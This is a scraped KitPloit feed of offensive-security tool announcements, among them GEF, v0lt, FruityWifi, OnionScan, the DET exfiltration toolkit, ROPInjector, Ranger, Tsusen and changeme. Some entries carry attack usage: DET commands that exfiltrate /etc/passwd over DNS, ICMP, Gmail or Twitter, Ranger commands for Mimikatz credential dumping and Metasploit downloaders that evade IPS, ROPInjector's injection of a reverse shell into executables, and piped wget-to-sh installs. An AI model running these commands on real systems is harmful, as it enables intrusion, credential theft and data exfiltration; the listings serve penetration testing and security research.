Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

GEF - Multi-Architecture GDB Enhanced Features for Exploiters & Reverse-Engineers

$
0
0
GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.
GEF fully relies on GDB API and other Linux specific source of information (such as /proc/pid ). As a consequence, some of the features might not work on custom or harden systems such as GrSec. It has fully support for Python2 and Python3 indifferently (as more and more distro start pushing gdb compiled with Python3 support).

Quick start
Simply make sure you're having a GDB 7.x+ .
 $ wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh
Then just start playing (for local files):
$ gdb -q /path/to/my/bin
gef> gef help
Or (for remote debugging)
remote:~ $ gdbserver 0.0.0.0:1234 /path/to/file 
And
local:~ $ gdb -q
gef> gef-remote your.ip.address:1234

Show me

x86

ARM

PowerPC

MIPS

Dependencies
There are none: GEF works out of the box! However, to enjoy all the coolest features, it is recommended to install:
Note : if you are using GDB with Python3 support, you cannot use ROPgadget as Python3 support has not implemented yet. Capstone and radare2-python will work just fine.
Another note : Capstone is packaged for Python 2 and 3 with pip . So a quick install is
$ pip2 install capstone    # for Python2.x
$ pip3 install capstone # for Python3.x
And same goes for ropgadget
$ pip[23] install ropgadget
The assemble command relies on the binary rasm2 provided by radare2 .



v0lt - Security CTF Toy Tools

$
0
0

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:
  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

Installation:
# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes
>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:
  • Crypto
    • Base64
    • Ceasar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionnary, custom word)
  • Shellcodes
    • Shellcode selection and download from Shell-storm repo
    • Shellcode formater
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support
    • Netcat
    • Telnet
And more Examples are available here

Changelog
Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3
  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2
  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0
  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree


FruityWifi v2.4 - Wireless Network Auditing Tool

$
0
0

FruityWifi is a wireless network auditing tool. The application can be installed in any Debian based system adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq.

v2.4
  • Utils have been added (replaces "ifconfig -a")
  • Kali Linux Rolling compatibility issue has been fixed

v2.3
  • monitor mode (mon0) has been fixed (new airmon-ng compatibility issue)

v2.2
  • Wireless service has been replaced by AP module
  • Mobile support has been added
  • Bootstrap support has been added
  • Token auth has been added
  • minor fix

v2.1
  • Hostapd Mana support has been added
  • Phishing service has been replaced by phishing module
  • Karma service has been replaced by karma module
  • Sudo has been implemented (replacement for danger)
  • Logs path can be changed
  • Squid dependencies have been removed from FruityWifi installer
  • Phishing dependencies have been removed from FruityWifi installer
  • New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
  • Domain name can be changed from config panel
  • New install options have been added to install-FruityWifi.sh
  • Install/Remove have been updated

v2.0 (alpha)
  • Web-Interface has been changed (new look and feel, new options).
  • Nginx has replaced Apache2 as default webserver.
  • Installation script has been updated.
  • Config panel has been changed.
  • Network interfaces structure has been changed and renamed.
  • It is possible to use FruityWifi combining multiple networks and setups.
  • Supplicant mode has been added as a module.
  • 3G/4G Broadband Mobile has been added as a module.
  • FruityWifi HTTP webinterface on port 8000
  • FruityWifi HTTPS webinterface on port 8443

v1.9
  • Service Karma has been replaced by Karma module
  • Service Supplicant has been replaced by nmcli module
  • Config page has been updated
  • Supplicant config has been changed (nmcli module is required)
  • dnspoof host file has been removed from config page (dnsspoof module is required)
  • Logs page has been updated
  • WSDL has been updated
  • Hostapd/Karma has been removed from installer (replaced by Karma module)
  • NetworkManager has been removed from installer (replaced by nmcli module)
  • install-modules.py has been added (install all modules from console)

v1.8
  • WSDL has been added
  • new status page has been added
  • logs can follow in realtime using the new status page (wsdl)

v1.6
  • Dependencies can be installed from module windows
  • minor fix

v1.5
  • New functions has been added
  • Source code has been changed (open file function)
  • minor fix

v1.4
  • New functions has been added (monitor mode)
  • config page has been changed
  • minor fix

v1.3
  • Directory structure has been changed
  • minor fix

v1.2
  • Installation script has been updated
  • SSLstrip fork (@xtr4nge) has been added (Inject + Tamperer options)
  • minor fix

v1.1
  • External modules can be installed from modules page
  • minor fix

v1.0
  • init


OnionScan - Onion Services Security Scan

$
0
0

The purpose of this tool is to make you a better onion service provider. You owe it to yourself and your users to ensure that attackers cannot easily exploit and deanonymize.

Go Dependencies
  • h12.me/socks - For the Tor SOCKS Proxy connection.
  • github.com/xiam/exif - For EXIF data extraction.
  • github.com/mvdan/xurls - For some URL parsing.

OS Package Dependencies
  • libexif-dev on Debian based OS
  • libexif-devel on Fedora

Installing

Install OS dependencies
  • On Debian based operating systems:
         sudo apt-get install libexif-dev    
  • On Fedora based operating systems:
         sudo dnf install libexif-devel    

Grab with go get
    go get github.com/s-rah/onionscan   


Compile/Run from git cloned source
    go install github.com/s-rah/onionscan   
and then run the program in
    ./bin/onionscan   
.
Or, you can just do
    go run github.com/s-rah/onionscan.go   
to execute without compiling.

Running
For a simple report detailing the high, medium and low risk areas found:
    ./bin/onionscan blahblahblah.onion   

The most interesting output comes from the verbose option:
    ./bin/onionscan --verbose blahblahblah.onion   

There is also a JSON output, if you want to integrate with something else:
    ./bin/onionscan --jsonReport blahblahblah.onion   

If you would like to use a proxy server listening on something other that
    127.0.0.1:9050   
, then you can use the --torProxyAddress flag:
    ./bin/onionscan --torProxyAddress=127.0.0.1:9150 blahblahblah.onion   


Apache mod_status Protection
This should not be news , you should not have it enabled. If you do have it enabled, attacks can:
  • Build a better fingerprint of your server, including php and other software versions.
  • Determine client IP addresses if you are co-hosting a clearnet site.
  • Determine your IP address if your setup allows.
  • Determine other sites you are co-hosting.
  • Determine how active your site it.
  • Find secret or hidden areas of your site
  • and much, much more.
Seriously, don't even run the tool, go to your site and check if you have /server-status reachable. If you do, turn it off!

Open Directories
Basic web security 101, if you leave directories open then people are going to scan them, and find interesting things - old versions of images, temp files etc.
Many sites use common structures style/ , images/ etc. The tool checks for common variations, and allows the user to submit others for testing.

EXIF Tags
Whether you create them yourself or allow users to upload images, you need to ensure the metadata associated with the image is stripped.
Many, many websites still do not properly sanitise image data, leaving themselves or their users at risk of deanonymization.

Server Fingerprint
Sometimes, even without mod_status we can determine if two sites are hosted on the sam infrastructure. We can use the following attributes to make this distinction:
  • Server HTTP Header
  • Technology Stack (e.g. php, jquery version etc.)
  • Website folder layout e.g. do you use /style or /css or do you use wordpress.
  • Fingerprints of images
  • GPG Versions being used.


DET - Data Exfiltration Toolkit

$
0
0
DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service.

Slides
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here .

Example usage (ICMP plugin)

Server-side:

Client-side:

Usage while combining two channels (Gmail/Twitter)

Server-side:

Client-side:

Installation
Clone the repo:
git clone https://github.com/sensepost/DET.git
Then:
pip install -r requirements.txt --user

Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption passphrase and so on). A configuration example file has been provided and is called: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "dataexfil@gmail.com",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}

Usage

Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode

Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns

Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

Modules
So far, DET supports multiple protocols, listed here:
  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other "services":
  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Roadmap

References
Some pretty cool references/credits to people I got inspired by with their project:

PeerTweet - Decentralized Feeds using BitTorrent's DHT

$
0
0

BitTorrent's DHT is probably one of the most resilient and censorship-resistant networks on the internet. PeerTweet uses this network to allow users to broadcast tweets to anyone who is listening. When you start PeerTweet, it generates a hash @33cwte8iwWn7uhtj9MKCs4q5Ax7B which is similar to your Twitter username (ex. @lmatteis ). The difference is that you have entire control over what can be posted because only you own the private key associated with such address. Furthermore, thanks to the DHT, what you post cannot be stopped by any government or institution.
Once you find other PeerTweet addresses you trust (and are not spam), you can follow them. This configures your client to store this user's tweets and broadcasts them to the DHT every once in a while to keep their feed alive. This cooperation of following accounts, allows for feeds to stay alive in the DHT network. The PeerTweet protocol also publishes your actions such as I just followed @919c.. or I just liked @9139.. and I just retweeted @5789.. . This allows the possibility for new users to find other addresses they can trust; if I trust the user @6749.. and they're following @9801.. , then perhaps I can mark @9801.. as not spam. This idea of publicly tweeting about your actions also allows for powerful future crawling analysis of this social graph.

How does it work?
PeerTweet follows most of the implementation guidelines provided by the DHT RSS feed proposal http://libtorrent.org/dht_rss.html . We implemented it on top of the current BEP44 proposal which provides get() and put() functionality over the DHT network. This means that, rather than only using the DHT to announce which torrents one is currently downloading, we can use it to also put and get small amounts of data (roughly 1000 bytes).
PeerTweet differentiates between two types of items:
  1. Your feed head . Which is the only mutable item of your feed, and is what your followers use to download your items and find updates. Your head's hash is what your followers use to know about updates - it's your identity and can be used to let others know about your feed (similar to your @lmattes handle). The feed head is roughly structured as follows:
    {
    "d": <unsigned int of minutes passed from epoch until head was modified>,
    "next": <up to 80 bytes of the next 4 items in the feed, directly 1,2,3 and 4 hops away. 20 bytes each.>,
    "n": <utf8 name of the feed>,
    "a": <utf8 http url of an image to render as your avatar>,
    "i": <utf8 description of your feed>
    }
  2. Your feed items . These are immutable items which contain your actual tweets and are structured:
    {
    "d": <unsigned int of minutes passed from epoch until when item was created>,
    "next": <up to 80 bytes of the next 4 items in the feed, 1, 2, 4 and 8 hops away. 20 bytes each.>,
    "t": <utf8 contents of your tweet. up to 140 chars>
    }

Skip lists
The reason items have multiple pointers to other items in the list is to allow for parallel lookups. Our skip list implementation differs from regular implementations and is targeted for network lookups, where each item contains 4 pointers so that when we receive an item, we can issue 4 get() requests in parallel to other items in the list. This is crucial for accessing user's feeds in a timely manner because DHT lookups have unpredictable response times.

Following
When you follow someone, you're essentially informing your client to download their feed and republish it every so often. The DHT network is not a persistent one, and items quickly drop out of the network after roughly 30 minutes. In order to keep things alive, having many followers is crucial for the uptime of your feed. Otherwise you can still have a server somewhere running 24/7 which keeps your feed alive by republishing items every 30 minutes.

Install
Install dependencies.
$ npm install

Installing native modules
The app comes with some native bindings. I used this code to make it run on my computer:
Source: https://github.com/atom/electron/blob/master/docs/tutorial/using-native-node-modules.md
npm install --save-dev electron-rebuild

# Every time you run "npm install", run this
./node_modules/.bin/electron-rebuild

# On Windows if you have trouble, try:
.\node_modules\.bin\electron-rebuild.cmd
To get ed25519-supercop to work on Windows I also had to install node-gyp and all the Python2.7 and Visual Studio stuff which node-gyp requires: https://github.com/nodejs/node-gyp
Then run these commands to build it on Windows:
npm install -g node-gyp
cd ./node_modules/ed25519-supercop/
HOME=~/.electron-gyp node-gyp rebuild --target=0.36.9 --arch=x64 --dist-url=https://atom.io/download/atom-shell

Run
Run this two commands simultaneously in different console tabs.
$ npm run hot-server
$ npm run start-hot
Note: requires a node version >= 4 and an npm version >= 2.

Toggle Chrome DevTools
  • OS X: Cmd Alt I or F12
  • Linux: Ctrl Shift I or F12
  • Windows: Ctrl Shift I or F12
See electron-debug for more information.

Toggle Redux DevTools
  • All platforms: Ctrl+H
See redux-devtools-dock-monitor for more information.

Externals
If you use any 3rd party libraries which can't be built with webpack, you must list them in your webpack.config.base.js
externals: [
// put your node 3rd party libraries which can't be built with webpack here (mysql, mongodb, and so on..)
]
You can find those lines in the file.

CSS Modules support
Import css file as css-modules using .module.css .

Package
$ npm run package
To package apps for all platforms:
$ npm run package-all

Options
  • --name, -n: Application name (default: ElectronReact)
  • --version, -v: Electron version (default: latest version)
  • --asar, -a: asar support (default: false)
  • --icon, -i: Application icon
  • --all: pack for all platforms
Use electron-packager to pack your app with --all options for darwin (osx), linux and win32 (windows) platform. After build, you will find them in release folder. Otherwise, you will only find one for your os.
test , tools , release folder and devDependencies in package.json will be ignored by default.

Default Ignore modules
We add some module's peerDependencies to ignore option as default for application size reduction.
  • babel-core is required by babel-loader and its size is ~19 MB
  • node-libs-browser is required by webpack and its size is ~3MB.
Note: If you want to use any above modules in runtime, for example: require('babel/register') , you should move them form devDependencies to dependencies .


ROPInjector - Convert any Shellcode in ROP and patch it into a given Portable Executable (PE)

$
0
0
A tool written in C (Win32) to convert any shellcode in ROP and patch it into a given portable executable (PE). It supports only 32-bit target PEs and the x86 instruction set.
Published in Blackhat USA 2015, "ROPInjector: Using Return Oriented Programming for Polymorphism and Antivirus Evasion" More info:

Usage
  ropinjector <file-to-infect> <shellcode-file> <output-file>* [options]*
(* denotes optional arguments)
e.g.
ropinjector.exe firefox.exe revshell.txt
  • file-to-infect : any 32-bit, non-packed PE
  • shellcode-file : the shellcode to patch in the PE file
  • output-file (optional) : The name of the output file. If not specified, ROPInjector will choose a suitable filename indicating the type of injection performed.
  • options :

text Force reading of shellcode file as text file. Shellcode in text
form must be in the \xHH\xHH\xHH format.

norop Don't transform shellcode to ROP.

nounroll Don't unroll SIBs.

noinj Don't inject missing gadgets.

getpc Don't replace getPC constructs in the shellcode.

entry Have shellcode run before the original PE code. Without this
option, ROPInjector will try to hook calls to ExitProcess(),
exit() and the like so that the shellcode runs last, right
before process exit.

-d<secs> Number of seconds to Sleep() before executing the shellcode.
When this option is specified, "entry" is also implicitly used.
ROPInjector will output some comma-delimited stats in the end. These are (in order of appearance):
  • the carrier PE filename
  • the output filename of the resulting patched file
  • initial size of the PE file in bytes
  • shellcode size in bytes
  • patch size in bytes
  • whether unroll is performed
  • whether shellcode has been converted to ROP
  • whether getPC constructs are replaced in the shellcode
  • whether access is given to the shellcode during entry (run first) or during exit (run last)
  • the delay the shellcode sleeps before it runs in seconds
  • initial number of instructions in the shellcode
  • number of instructions in the shellcode after unrolling and other manipulations, but before ROP
  • number of instructions replaced by ROP gadgets (out of the ones in the previous metric, and not the initial number of instructions)
  • number of gadgets injected
  • number of gadget segments
  • number of instructions replaced by injected gadgets

Download ROPInjector

Ranger - Tool To Access And Interact With Remote Microsoft Windows Based Systems

$
0
0

A tool to support security professionals access and interact with remote Microsoft Windows based systems.
This project was conceptualized with the thought process, we did not invent the bow or the arrow, just a more efficient way of using it.
Ranger is a command-line driven attack and penetration testing tool, which as the ability to use an instantiated catapult server to deliver capabilities against Windows Systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM) he or she can gain access to systems that are apart of the trust.
Using this capability a security professional can extract credentials out of memory in clear-text, access SAM tables, run commands, execute PowerShell scripts, Windows Binaries, and other tools.
At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed using our home labs in an effort to support security professionals doing legally and/or contractually supported activities.
More functionality is being added, but at this time the tool uses the community contributions from repositories related to the PowerShell PowerView, PowerShell Mimikatz and Impacket teams.

Managing Ranger:

Install:
wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update:
ranger --update

Usage:
  • Ranger uses a combination of methods and attacks, a method is used to deliver an attack/command
  • An attack is what you are trying to accomplish
  • Some items are both a method and attack rolled into one and some methods cannot use some of the attacks due to current limitations in the libraries or protocols

Methods & Attacks:
--scout
--secrets-dump

Method:
--wmiexec
--psexec
--atexec

Attack:
--command
--invoker
--downloader
--executor
--domain-group-members
--local-group-members
--get-domain-membership
--get-forest-domains
--get-forest
--get-dc
--find-la-access

Command Execution:

Find Logged In Users:
ranger.py [-u Administrator] [-p Password1] [-d Domain] --scout

SMBEXEC Command Shell:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --smbexec -q -v -vv -vvv

PSEXEC Command Shell:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -q -v -vv -vvv

PSEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --psexec -c "Net User" -q -v -vv -vvv

WMIEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec -c "Net User"

WMIEXEC PowerShell Mimikatz Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker

WMIEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader

WMIEXEC Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe"

ATEXEC Command Execution:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --atexec -c "Net User" --no-encoder

ATEXEC PowerShell Mimikatz Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --invoker --no-encoder

ATEXEC Metasploit web_delivery Memory Injector (requires Metasploit config see below):
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --downloader --no-encoder

ATEXEC Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --executor -c "binary.exe" --no-encoder

SECRETSDUMP Custom Code Memory Injector:
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --secrets-dump

Create Pasteable Mimikatz Attack:
ranger.py --invoker -q -v -vv -vvv

Create Pasteable web_delivery Attack (requires Metasploit config see below):
ranger.py --downloader -q -v -vv -vvv

Create Pasteable Executor Attack:
ranger.py --executor -q -v -vv -vvv

Identifying Groups Members and Domains
  • When identifying groups make sure to determine what the actual query domain is with the --get-domain-membership
  • Then when you query a group use the optional --domain , which allows you to target a different domain than the one you logged into
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --get-domain-membership
ranger.py [-u Administrator] [-p Password1] [-d Domain] [-t target] --wmiexec --domain "Domain.local2"

Notes About Usage:

Cred File Format:
  • You can pass it a list of usernames and passwords or hashes in the following format in the same file:
username password
username LM:NTLM
username :NTLM
username **NO PASSWORD**:NTLM
PWDUMP
username PWDUMP domain
username password domain
username LM:NTLM domain
username :NTLM domain
username **NO PASSWORD**:NTLM domain
PWDUMP domain
username PWDUMP domain

Credential File Caveats:
  • If you provide domain names in the file they will be used instead of the default WORKGROUP.
  • If you supply the domain name by command line -d , it will infer that you want to ignore all the domain names in the file.

Command Line Execution:
  • If you do not want to use the file you can pass the details through command line directly.
  • If you wish to supply hashes instead of passwords just pass them through the password argument.
  • If they are PWDUMP format and you supply no username it will pull the username out of the hash.
  • If you supply a username it will think that the same hash applies to a different user.
  • Use the following formats for password:
password
LM:NTLM
:NTLM
PWDUMP

Targets and Target Lists:
  • You can provide a list of targets either by using a target list or through the target option.
  • You can supply multiple target list files by comma separating them and it will aggregate the data and remove duplicates and then exclude your IP address from the default interface or the interface you provide.
  • The tool accepts, CIDR notations, small ranges (192.168.195.1-100) or large ranges (192.168.194.1-192.163.1.1) or single IP addresses.
  • Again just comma separating them by command line or put them in a new line delimited file.

Exclusions and Exclusion Lists:
  • You can exclude targets using the exclude arguments as well, so if you do not touch a little Class C out of a Class A it will figure that out for you.

Intrusion Protection Systems (IPS):
  • Mimikatz, Downloader and Executor use PowerShell memory injection by calling other services and protocols.
  • The commands are double encoded and bypass current IPS solutions (even next-gen) unless specifically tuned to catch these attacks.
  • ATEXEC is the only one that currently lands on disk and does not encode, I still have some rewriting to do still.

Web_delivery attacks:
  • To setup Metasploit for the web_delivery exploit start-up Metasploit and configure the exploit to meet the following conditions.
use exploit/multi/script/web_delivery
set targets 2
set payload <choose your desired payload>
set lhost <your IP>
set lport <port for the shell make sure it is not a conflicting port>
set URIPATH /
set SRVPORT <the same as what is set by the -r option in ranger, defaults to 8888>
exploit -j

FAQ

Access Deined Errors for SMBEXEC and WMIEXEC
I'm getting access denied errors in Windows machines that are part of a WORKGROUP.
When not part of a domain, Windows by default does not have any administrative shares. SMBEXEC relies on shares being enabled. Additionally, WMIC isn't enabled on WORKGROUP machines. SMBEXEC and WMIEXEC are made to target protocols enabled on domain systems. While its certainly possible to enable these functions on a WORKGROUP system, note that you are introducing vulnerable protocols (after all, that's what this tool is made to attack). Enabling these features on your primary home system that your significant other uses for Facebook as well is probably not the best idea.
  • Make sure this is a test box you own. You can force the shares to be enabled by following the instructions here: http://www.wintips.org/how-to-enable-admin-shares-windows-7/
  • If you want to determine what shares are exposed and then target them, you can use a tool like enum4linux and then use the --share share_name argument in ranger to try and execute SMBEXEC.

Future Features:

Nmap:
  • The nmap XML feed is still in DRAFT and it is not functioning yet.

Credential Parsing:
  • Clean credential parsing is in development to dump to files.

Colored Output:
  • Add colored output with https://pypi.python.org/pypi/colorama

Presented At:
BSides Charm City 2016: April 23, 2016

Distributions the tool is a part of:
Black Arch Linux



Tsusen - Network Traffic Sensor

$
0
0
Tsusen (津波センサー) is a standalone network sensor made for gathering information from the regular traffic coming from the outside (i.e. Internet) on a daily basis (e.g. mass-scans, service-scanners, etc.). Any disturbances should be closely watched for as those can become a good prediction base of forthcoming events. For example, exploitation of a newly found web service vulnerability (e.g. Heartbleed) should generate a visible "spike" of total number of "intruders" on affected network port.

The following set of commands should get your Tsusen sensor up and running (out of the box with default settings and monitoring interface any and HTTP reporting interface on default port 8339 ):
sudo apt-get install python-pcapy
sudo pip install python-geoip python-geoip-geolite2
cd /tmp/
git clone https://github.com/stamparm/tsusen.git
cd tsusen/
sudo python tsusen.py



Sensor's results are stored locally in CSV files on a daily basis (e.g. 2015-10-27.csv ) with periodic (flush) write of current day's data (e.g. every 15 minutes). Sample results are as follows:
proto dst_port dst_ip src_ip first_seen last_seen count
TCP 1080 192.165.63.181 222.186.56.107 1446188056 1446188056 1
TCP 1080 192.165.63.181 64.125.239.78 1446191096 1446191096 1
TCP 1081 192.165.63.181 111.248.100.185 1446175412 1446175412 1
TCP 1081 192.165.63.181 111.248.102.150 1446183374 1446183374 1
TCP 1081 192.165.63.181 36.225.254.129 1446170512 1446170512 1
TCP 1095 192.165.63.181 36.229.233.199 1446177047 1446177047 1
TCP 111 192.165.63.181 80.82.65.219 1446181028 1446181028 1
TCP 111 192.165.63.181 94.102.52.44 1446181035 1446181035 1
TCP 11122 192.165.63.181 222.186.56.39 1446198391 1446198391 1
TCP 11211 192.165.63.181 74.82.47.43 1446200598 1446200598 1
TCP 135 192.165.63.181 1.160.12.156 1446163293 1446163294 3
TCP 135 192.165.63.181 104.174.148.124 1446178211 1446178212 3
TCP 135 192.165.63.181 106.242.5.179 1446180063 1446180064 3
TCP 135 192.165.63.181 173.30.55.76 1446184279 1446195229 6
TCP 135 192.165.63.181 174.100.28.2 1446179470 1446202911 9
TCP 135 192.165.63.181 218.253.225.163 1446174945 1446195646 9
TCP 135 192.165.63.181 219.114.66.114 1446169303 1446183947 6
TCP 135 192.165.63.181 222.186.56.43 1446165515 1446202626 5
...
where proto (e.g. in first entry this is TCP ) represents the protocol that has been used by initiator coming from src_ip (e.g. in first entry this is 222.186.56.107 ) toward our <dst_ip:dst_port> (e.g. in first entry this is 192.165.63.181:1080 ) service, first_seen represents the time of (that day's first) connection attempt represented in Unix timestamp format (e.g. in first entry this is 1446188056 , which stands for Fri, 30 Oct 2015 06:54:16 GMT ), last_seen represents (that day's last) connection attempt (e.g. in first entry it's the same as the first_seen value), while the count holds a total number of connection attempts.
Results can be accessed through the HTTP reporting interface (Note: default port is 8339 ):



Changme - A Default Credential Scanner

$
0
0
Changeme is designed to be simple to add new credentials without having to write any code or modules.

changeme keeps credential data separate from code. All credentials are stored in yaml files so they can be both easily read by humans and processed by changeme. Credential files can be created by using the mkcred.py tool and answering a few questions.

Installation

Use pip to install the python modules:
pip install -r requirements.txt

Usage Examples

Scan a subnet for default creds:
./changeme.py -s 192.168.59.0/24

Scan a single host:
./changeme.py -s 192.168.59.100

Scan a subnet for Tomcat default creds and set the timeout to 5 seconds:
./changeme.py -s 192.168.59.0/24 -n "Apache Tomcat" --timeout 5


Ubuntu 16.04 LTS (Xenial Xerus) - The leading OS for PC, tablet, phone and cloud

$
0
0

Ubuntu is an ancient African word meaning ‘humanity to others’. It also means ‘I am what I am because of who we all are’. The Ubuntu operating system brings the spirit of Ubuntu to the world of computers.

Where did it all begin?

Linux was already established as an enterprise server platform in 2004, but free software was not a part of everyday life for most computer users. That’s why Mark Shuttleworth gathered a small team of developers from one of the most established Linux projects — Debian — and set out to create an easy-to-use Linux desktop: Ubuntu.
The vision for Ubuntu is part social and part economic: free software, available to everybody on the same terms, and funded through a portfolio of services provided by Canonical.

Ubuntu releases

The Ubuntu team broke new ground in committing to a programme of scheduled releases on a predictable six-month basis. It was decided that every fourth release, issued on a two-year basis, would receive long-term support (LTS). LTS releases are typically used for large-scale deployments.

Ubuntu is different from the commercial Linux offerings that preceded it because it doesn’t divide its efforts between a high-quality commercial version and a free ‘community’ version. The commercial and community teams collaborate to produce a single, high-quality release, which receives ongoing maintenance for a defined period. Both the release and ongoing updates are freely available to all users.

New features in 16.04 LTS


Snap application format

Ubuntu 16.04 LTS introduces a new application format, the ‘snap’, which can be installed alongside traditional deb packages. These two packaging formats live quite comfortably next to one another and enable Ubuntu to maintain its existing processes for development and updates. More information is available here.

Updated Packages

As with every new release, packages--applications and software of all kinds--are being updated at a rapid pace. Many of these packages came from an automatic sync from Debian's unstable branch; others have been explicitly pulled in for Ubuntu 16.04.
For a list of all packages being accepted for Ubuntu 16.04, please subscribe to xenial-changes.

Linux kernel 4.4

Ubuntu 16.04 LTS is based on the long-term supported Linux release series 4.4.

Python 3

